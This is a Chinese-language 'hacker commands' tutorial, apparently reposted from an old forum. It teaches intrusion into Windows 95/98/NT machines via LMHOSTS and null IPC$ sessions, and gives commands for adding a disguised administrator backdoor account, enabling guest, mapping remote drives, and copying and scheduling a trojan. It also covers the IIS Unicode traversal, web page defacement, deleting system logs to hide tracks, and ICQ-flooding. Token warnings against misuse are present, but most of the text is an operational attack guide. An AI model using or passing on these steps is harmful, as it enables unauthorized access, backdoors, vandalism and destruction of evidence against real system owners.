[文章][破解,骇客][学习]骇客指令

[文章][破解,骇客][学习]骇客指令 【駭客指令】 ? 何謂IP位址? 所謂IP就像是我們家的地址,網際網路就像是一個地球村,當你撥號或連上網路時就像你要加入到這地球村的一份子,既然要加入的話,當然就需要一個地址囉!也像是嬰兒出生了,就需要有一個名字一樣,只是在網際網路上的這名字不是中文的,而是由4組數字來分別,這4組當中以"."來分別,如 255.255.255.255 這四組中從0~255,不得大於255,所以列子中的這一組是最大的了。 ? 如何知道本身及對方的IP位址? 知道對方的IP是駭客的第一要素,不知道IP就什麼都做不了了。 在WINDOWS中尋找出Winipcfg.exe按兩下,或從"開始/執行"視窗打入Winipcfg.exe按執行,但是你要連上網路才行,只不過這只有知道本身的IP位址。 在開啟"開始/程式集/MS-DOS模式"視窗,輸入NETSTAT -N後按ENTER,可以得到本身及跟網路上跟你有接觸的IP,左邊是你本身的IP,右邊為對方的。 ? 要如何知道對方是使用哪一家的ISP上網的呢? 哈阿哈~~那就簡單了,在"開始/程式集/MS-DOS模式"視窗打入NETSTAT按執行這樣就知道對方是使用那一家ISP上網了,不過呢?有一些很不負責的ISP沒有設定也就沒有辦法知道了,但是也是可以使用瀏覽器偵測出來。以後再公佈吧! ? 當知道了對方的IP之後,要如何知道對方是在那一國家省份或縣市上網的呢? 比如對方的IP是163.30.100.16 然後在"開始/程式集/MS-DOS模式"視窗打入 "TRACERT 163.30.100.16" 後按執行得到如下的訊息: ----------------------------------------------------------------- 1 115 ms 105 ms 110 ms h199.s42.ts.hinet.net [168.95.42.199] 2 99 ms 103 ms 103 ms h158.s42.ts.hinet.net [168.95.42.158] 3 106 ms 100 ms 100 ms h241.s42.ts.hinet.net [168.95.42.241] 4 104 ms 108 ms 101 ms TaiNan-R01.BR.HiNet.NET [168.95.202.133] 5 109 ms 107 ms 105 ms TaiPei-R02.BR.HiNet.NET [168.95.202.253] 6 115 ms 107 ms 112 ms h10.s78.ts.hinet.net [168.95.78.10] 7 106 ms 109 ms 107 ms h48.s78.ts.hinet.net [168.95.78.48] 8 268 ms 287 ms 249 ms h16.s100.ts30.hinet.net [163.30.100.16] ------------------------------------------------------------------ 從第4行可以知道我是在台南用HINET上網的,從第5行可以看出對方是在台北上網的,該是台北縣,也是用HINE上網的。其實呢!還可以看出更多的東西,慢慢的體會吧!最少可以知道你跟對方的連線是否有順暢。 ? 使用95或98侵入對方的電腦的條件,是否需要工具呢? 只要知道對方的ip,及電腦名稱即可,也都不需要工具,在此強調,不要滿腦筋老是想到要使用工具,其實我只是一個寫程式的,就像程式完成了交給客戶使用,而客戶只會使用,他們了解什麼呢?至於為什麼寫程式會涉及網路的侵入呢?那是因為我有些程式需要兩岸三地,或在國際間傳送資料,加上客戶有時連專線費用都要省,所以不得不出此下策。 ? 那要如何知道對方的電腦名稱呢? 當知道對方的ip之後,如對方的IP是163.30.100.16,在"MS-DOS"視窗中輸入"nbtstat -A 163.30.100.16",會得到一些信息(因涉及對方隱私,故不列說明),第一行就是對方的電腦名稱,第二行是工作群組或網域,第三行是電腦說明,如果還有第四、五行的話,就表示對方的電腦是在區網中,也就是說他的電腦還準備連接內部的網路。最後一行是他進入系統的使用者名稱。 請注意指令的參數是要大寫的,另外要是對方使用的電腦是98而且沒有資源分享,或許你就偵測不出來了,除非使用特殊的手法,有些網友常會在電腦名稱輸入自己的真實姓名,如果這樣的話,那麼我們就會知道他的真實姓名了。 ? 如何把對方的ICQ玩弄於手掌間,包括對方隱形也知道他上線了,也可以炸他,也可以讓他發出聲音,也可以關掉他,甚至可以讓ICQ完全的刪掉??? (,).其實不管是什麼樣的網路軟體,只要知道程式開啟的PORT就可以控制他,像是網頁的話大部份都是PORT=80,一上網呢 ,就會開139,舊版的95都不會關了這一PORT,所以就常被當機,但98也是有,以後再述,最多人用的NetMeeting聊天一開就是1503,登入及聊天就會開1720跟1730。 (,)ICQ呢?在以前時都是開在1027,可是因為常受到攻擊,所以現在的PORT都開在好幾千以上了,所以有些的炸ICQ程式都不 能用了,可是只要知道PORT之後,還是照炸不誤, (,:會寫程式的人可以自己寫,只要從PORT送進一些信息就可以達到目地,如送進CHR(7)這類的封包...等等,甚至可以毀了ICQ,不會寫的呢?是不是就完了呢?不會的,站長了解您們,所以您們可以到"駭客寶箱"下載,那軟體的功能很多,也很強,幾乎連要毀掉對方的ICQ也可達到,還可以炸他,跟他開玩笑,輸入對方的ICQ號碼後,他會去找對方的PORT跟IP,只是有時PORT不是很準確,要是這樣的話,你就把偵測出來的PORT加上256就行了。 (,:不要問我那軟體怎麼用,真是很報歉,因為一問的話,那我回答的就會很多,到時我就忙死了,這樣就不能繼續公佈一些指令了,請見諒。 (,:在前面的基礎忘了公佈什麼是PORT,真是很報歉,以後再插播吧!對了,前面公佈的NETSTAT -N就可以看到PORT了。 ? 如何防範ICQ受到破壞?需要工具嗎? (,)聽說有一套軟體可以救回被炸的ICQ,可是呢?其實都不用軟體的,只要將ICQ目錄中的DB備份起來,被炸時關了ICQ,之後再將備份好的DB覆蓋過去就行了,如果嫌這樣太麻煩了,那麼會寫程式的就用寫的吧!只是一行的程式罷了,要不然您們還是去找那套軟體吧~聽說很好找的,我沒有用過,所以本站也不提供。 (,)以上是說被炸,那要如何不被炸呢,ICQ中有一個防火牆的項目,進去後設定你的PORT要開在哪裡,保証讓對方查PORT查的昏倒,當然是要設高一點的PORT了,可是呢?要是你ICQ名單上的人要炸你也是很容易的,他只要從ICQ發一封信息給你,馬上到DOS下執行NETSTAT -N,這樣你的PORT就馬上被看到了,換言之..除了對方是高人外,炸你ICQ的人一定是你的朋友。 ? 如何使用95或98侵入對方的電腦?需要工具嗎? 相信看過前面的公佈後,網友們該會知道對方的IP及電腦名稱了吧!ok 那這樣就行了,以下我只說如何做,要是網友想要知道原理,請在留言版,或是"駭客走廊"通知我,我會另外弄另一網頁來公佈他的原理,因為實在是太長了。步驟如下..請參考 ,.在Windows下有一個檔名為"LMHOSTS.SAM"的檔案,把副檔名給刪了,變成了"LMHOSTS",如果沒有這檔案的網友,就用記事本新 增一個就行了。 ,.用記事本開啟LMHOSTS,再把裡面的內容都刪了,在第一行輸入對方的IP及電腦名稱,如 163.32.33.34 APP,163.32.33.34就是對方的IP,空一格後面的APP是對方的電腦名稱,接著存檔。 ,.到"MS-DOS模式"下輸入NBTSTAT -R 按ENTER ,.到"開始/尋找/電腦"輸入對方的電腦名稱,按立即尋找,在下面的視窗中就會出現了對方的電腦了,按他的電腦兩下,就是進去了對方的電腦了,連對方有防火牆也檔不住。 ,.入侵的前題:是你在進入95.98時需要輸入USERNAME跟密碼,對方的電腦也要有資源分享,若需要密碼(一般的使用者都不會設),或是對方沒有資源分享的話,也都不需要破解密碼的程式,但需要用NT或UNIX入侵,以後也會慢慢的公佈。 ? 如何侵入NT主機及無資源分享的主機?需要工具嗎? WU.你問了那麼多,無非就是侵入NT主機,一侵入你問我的7點問題就全都解決了,哈哈... 本來是要在下一次的"駭客指令"中公佈的,你這樣窮追猛打的問我,加上本站也即將關閉了,所以就在最後送你及各位網友一份禮吧!以下的指令很簡單,但需要在NT下DOS中執行 ---------------------------------------------------------------------------------------------------------------------------------------------------------------------- (1) net use \\對方的ip \ipc$ ""/user:"" **此行指令為建立"無意義ipc通訊" (2) usrstat 對方網域 如對方的網域是domain就是打usrstat domain,(以下均以domain表示網域。 **此行為了解對方電腦有哪些使用者.名稱.及登入時間 (3)global "domain user" domain **得知群組中的使用者 (4)netdomain query **得知網域的處理原則 (5)net use 要連接檔案的路徑 **將對方的硬碟變成我們硬碟的一部份 (6)... ------------------------------------------------------------------------------------------------------------------------------------------------------------------------ 從(2)之後要是你執行了沒有那指令的話,那麼到NT的正版光碟尋找,在此我漏了如何得知密碼,從你給我的MAIL中知道你對電腦也十分有研究,我相信當建立了IPC通訊後,你該是動動腦的時後了,要是我連這也公佈了,那麼就違反我要關站的原則了。 重要的一點是,當你知道對方的最高使用者,及密碼後,再重開機,你想你可以辦任何事了。另外..你還要研究"信任網域"的基礎,那會收獲更多的。 以上..千萬不要做壞事,需要知道現在有很多ISP公司都使用NT,千萬不要偷別人的帳號來用,OK 一把不利的菜刀給你了,磨刀石在你的身上,看你怎麼磨利菜刀了,也怎麼用這把菜刀。如果執行不成功的話,那麼就改一下Lmhosts,有些指令要拿到最高使用者及密碼需要這檔的對映,所以當你拿到使用者及密碼後要重開機的原因在此。 不要再進一步問我這問題,我一說 就違反了我關站的原則了。以上拙見 謹供參考 ? 什麼是PORT呢? 如果把IP解釋成我們家的地址的話,那麼PORT就是門了。當然我們家有時不只一扇門,使用的軟體不一樣,所要開啟的門也就不一樣,一般來說當我們開啟一套網路軟體後,便會開啟一個或數個PORT,有些軟體所開的PORT是固定的,但大部份都沒有固定。駭客寶箱中有一掃PORT的軟體,讓網友們了解什麼是port,各位網友請服用。 网络安全(黑客)的第一步 做什么事情都不急于求成，记得当初给我印象最深的是，YINJIE说的一句话:“技术具有一定的局限性”。别去羡慕那种高层次的技术，说实话，那些现在还不适合你。 说了这么一大堆废话，想必大家都会问，“如果我要学‘奇客’应该怎么开始呢,”。下面的内容是我个人的意见。 一、计算机基础 1)DOS命令 cd (改变当前目录) copy (拷贝文件) del (删除文件) deltree(删除目录树) dir(列文件名) edit(文本编辑) format( 格式化磁盘 ) md(建立子目录) mem (查看内存状况) type(显示文件内容) rd(删除目录) ren(改变文件名) ..... 这些命令虽然和网络安全没有直接的关系，但这个是你起步时必须要知道的，也就是说，如果这些命令的应用还没有掌握，就必须先把这些给搞懂了。 2)对WINDOWS界面的了解 玩过电脑的人都知道，友好的界面，操作起来也不是很难，但我要你达到的不是操作这个目的，而是原理，暂且不说汇编程序这些，你至少也应该知道什么东西放在哪个目录下吧～ 如果你对其的熟练程度不亚于比尔?盖茨对Windows的了解度，那你真的就成功了。呵呵，开个玩笑，至少大家现在还达不到这个水平。 二、网络相关 1、应用GOOGLE或其它搜索引擎，其实它才是你最好的老师，我也应该感谢LANTUCHEN让我对GOOGLE有着这么大的兴趣。也许有些功能是你想象不到的，比如，你可以用GOOGLE来找出漏洞的主机，也就是，你只要在GOOGLE中填入相关的一些漏洞代码(比如你利用UNICODE漏洞的时候，是不是在IE中打入一些代码来实现了，这就恰好符合了GOOGLE的要求，呵呵)，就可以搜索到一批相关的漏洞。 2、对端口的认识 端口就好象是大门，比如象我们学校，就有N个大门，东南西北都有，就是说，一个服务器也可以开N个端口，不过，也是有一定的限制的。 现在我介绍一下常见的端口吧～ 1)、telnet登录的端口 (23/tcp) 这个信息表明远程登录服务正在运行，在这里你可以远程登录到该主机，这种不用密码的远程登录服务是危险的，如果可以匿名登录，任何人可以在服务器和客户端之间发送数据。 2)、WWW(80/TCP)端口 它表明WWW服务在该端口运行 别告诉我你不知道WWW服务是什么哦，也就是说，如果有网站的服务器都有80端口。 3)、FTP(21/tcp) ftp服务和TELNET服务一样，你还可以从FTP服务器上获得或上传木马等，有的还是匿名登陆的，不过这样的好事好像不多。 4)、ECHO(7/tcp) 你在命令行中试着打入echo 我是一个奇客 >>c:\qiker.txt,看C盘看看，是不是多了一个文件，不用我说，大家也应该知道什么作用了吧～ 5)、smtp端口(25/tcp) 该端口开放邮件传输 如果你的技术成熟，也许就能用它穿过防火墙。 6)、finger (79/tcp) 端口 对入侵者来说是一个非常有用的信息，从它可以获得用户信息，查看机器的运行情况等。 finger服务 7)、远程控制(3389) 还有一个端口要重点介绍，对于你们来说，3389是不可避免的，因为他也是最容易被让你操作的，有空，我也可以给你们做几个3389的肉鸡让你们玩玩啊～ 再比如110，13，22……等，都必须去掌握。 3、木马的基本知识 尽管老资格的“黑客”不大会去使用木马，但我观察，绝大部分的入侵都是通过木马来进行的，比如小榕的一个SRV.exe,那也是木马中的一种啊。它的威力是众所周知的，一但被植入，就有被远程控制的可能，攻击者就可以象操作自己的机器一样控制你的机器，甚至可以远程监控你的所有操作。 你必须去了解木马是如何侵入的,入侵的基本原理。在这里，我希望你会用它并且很熟悉的使用，记得当时我也是从接触木马开始的，它培养了我对黑客技术的兴趣。 当今比较流行的木马有冰河的木马，我曾经问它是否会继续开发冰河，他给了完全否定的答案，呵呵，并且说它的危害性太大了。 它的默认端口是7626。 BO2000 这个比较古老的木马了，一般那些资深的黑客也都使用过它。 我叫你了解和掌握使用方法，并不是说，叫你知道去破坏啊， or you are a badboy～别误会，不是说你。并不需要你了解所有的木马，只要了解基本原理。 放送下，讲个故事给大家听吧:传说希腊人围攻特洛伊城，久久不能得手。后来想出了一个木马计，让士兵藏匿于巨大的木马中。大部队假装撤退而将木马摈弃于特洛伊城下，让敌人将其作为战利品拖入城内。木马内的士兵则乘夜晚敌人庆祝胜利、放松警惕的时候从木马中爬出来，与城外的部队里应外合而攻下了特洛伊城。 4、对网络命令的熟悉 1)、NET 下面的操作你TELNET到对方主机上才会有效果。 你也可以在本地演示: 我要添加一个用户，为了让对方难察觉，最好贴加一个用户和系统用户差不多的 比如admin net user admin pass /add 再将这个用户加到管理组 net localgroup administrator admin /add 这样就算一个后门做好了～这台机子也就可以说是你的肉鸡了。 net start telnet 这样可以打开对方的TELNET服务. 为了防止admin用户被察觉 将Guest用户激活，guest是NT的默认用户，而且很难删除的 net user guest /active:yes 这里是把一个用户的密码改掉，我们把guest的密码改为lovechina。 net user guest lovechina 一般IPC$入侵用NET比较多吧 基本命令是 net use \\211.15.66.169\ipc% "123456" /user:"qiker" (这个IP是我的，可千万别黑哦) 123456是密码，qiker是用户 退出的命令是 net use \\\ipc$ /delte 先别急着退出，查看硬盘上的东西，就把它的C盘映射到我的Z盘吧～ net use z:\\211.15.66.169\c$ at命令是用来运行程序的 一般你会复制一个木马上去 COPY C:\binhe.exe \\211.15.66.169\admin$ 在运行之前，你还必须要先知道他的时间 net time \\211.15.66.169 将会返回一个时间，这里假设时间为2:05,现在需要新建一个作业，其ID=1 at \\211.15.66.169 2:07 binhe.exe 2)、set 要黑别人网页必须要知道他的目录是在哪里的，默认情况一般会在c:\inetup\wwwroot 登陆到对方机子打入SET命令就可以看到: COMPUTERNAME=PENTIUMII ComSpec=D:\WINNT\system32\cmd.exe CONTENT_LENGTH=0 GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=*/* HTTP_ACCEPT_LANGUAGE=zh-cn HTTP_CONNECTION=Keep-Alive HTTP_HOST=211.15.66.169 HTTP_ACCEPT_ENCODING=gzip, deflate HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) NUMBER_OF_PROCESSORS=1 Os2LibPath=D:\WINNT\system32\os2\dll; OS=Windows_NT Path=D:\WINNT\system32;D:\WINNT PATHEXT=.COM;.EXE;.BAT;.CMD PATH_TRANSLATED=E:\vlroot(大家看到这里没有，这就是网站的目录了。) PROCESSOR_ARCHITECTURE=x86 PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel PROCESSOR_LEVEL=6 PROCESSOR_REVISION=0303 PROMPT=$P$G QUERY_STRING=/c+set REMOTE_ADDR=XX.XX.XX.XX REMOTE_HOST=XX.XX.XX.XX REQUEST_METHOD=GET script_NAME=/scripts/..%2f../winnt/system32/cmd.exe SERVER_NAME=XX.XX.XX.XX SERVER_PORT=80 SERVER_PORT_SECURE=0 SERVER_PROTOCOL=HTTP/1.1 SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0 SystemDrive=D: SystemRoot=D:\WINNT TZ=GMT-9 USERPROFILE=D:\WINNT\Profiles\Default User windir=D:\WINNT 要黑很容易，只要把自己准备好的网页替换上去就是了，默认主页名称一般会是default.htm,default.asp,index.html,index.htm,index.asp 3)、nbtstat 这个命令非常的重要，一般你也许会听说139端口开着有多危险，因为你只要开着，就可以通过NETSTAT来得到用户，只要破解 出来了， 那你的机子就完蛋了。 命令是 nbtstat -A XX.XX.XX.XX -A一定要大写哦。 下面是得到的结果。 NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- Registered Registered Registered Registered Registered Registered Registered Reg istered Registered Registered Registered MAC Address = 00-E0-29-14-35-BA PENTIUMII <00> UNIQUE PENTIUMII <20> UNIQUE ORAHOTOWN <00> GROUP ORAHOTOWN <1C> GROUP ORAHOTOWN <1B> UNIQUE PENTIUMII <03> UNIQUE INet~Services <1C> GROUP IS~PENTIUMII...<00> UNIQUE ORAHOTOWN <1E> GROUP ORAHOTOWN <1D> UNIQUE ..__MSBROWSE__.<01> GROUP <03>前面的就是用户。 这里的用户是PENTIUMII。 4)、attrib 这个是去只读命令 attrib -r index.htm 这个命令是把index.htm的只读属性去掉。 如果把“-”改为“+”则是把这个文件的属性设置为只读 attrib +r index.htm 5)、netstat 这个命令，我称它为监听命令，只要我和某台机子通讯，我就可以得到他的IP netstat -an 不过你的速度一定要比快 6)、echo echo 奇客>index.htm echo 奇客>>index.htm 第一个的意思是覆盖index.htm原有的内容，把“奇客”写进index.htm。 第二个的意思是把“奇客”加到index.htm里面。 “>>”产生的内容将追加进文件中，“>”则将原文件内容覆盖。 大家可以本地测试 7)、del 现在的网警可不是喝粥的，不会两手发软，你还是赶快清理你的脚印，就是所谓的日志。 NT/2000的日志有这些需要删除了。 del C:\winnt\system32\logfiles\*.* del C:\winnt\ssytem32\config\*.evt del C:\winnt\system32\dtclog\*.* del C:\winnt\system32\*.log del C:\winnt\system32\*.txt del C:\winnt\*.txt del C:\winnt\*.log 用小榕的工具也可以，你只要把文件复制上去，再打几个命令，就行 5、网络协议 1)、TCP/IP及其应用。TCP/IP是Internet上使用的协议，而Internet是世界上最大的互联网络。有关TCP/IP的各个方面，包括开放式通信模型、TCP/IP通信模型、IP网络中的命名和寻址机制、地址解析及反向地址解析协议、DNS域字服务器、WINS、地址发现 IP网络中的路由协议(RIP、OSPF等)、互联网打印协议、LDAP目录服务、远程访问协议、IP安全与防火墙。如何为协议、IPv6、 Windows 9x/NT配置TCP/IP;如何使用TCP/IP应用程序，包括远程登录、FTP、Web浏览等 2)、还要了解UDP协议 比如我们使用的QQ，它就是通过UDP协议来传输信息的。不过它有个特征就是只管传输不管对方是否收到。 3)、icmp等几个协议 如果你想尽快接触那种可爱型的拒绝服务式攻击，你必须对这些了如指掌。 概念性:网络安全通过对黑客行为和各种攻击进行分类、分析，论述了如何在具体实践中对付黑客的入侵，如何维护系统的安全;讨论了计算机安全所涉及的法律问题以及如何在高风险环境中应用密码学知识来保护信息。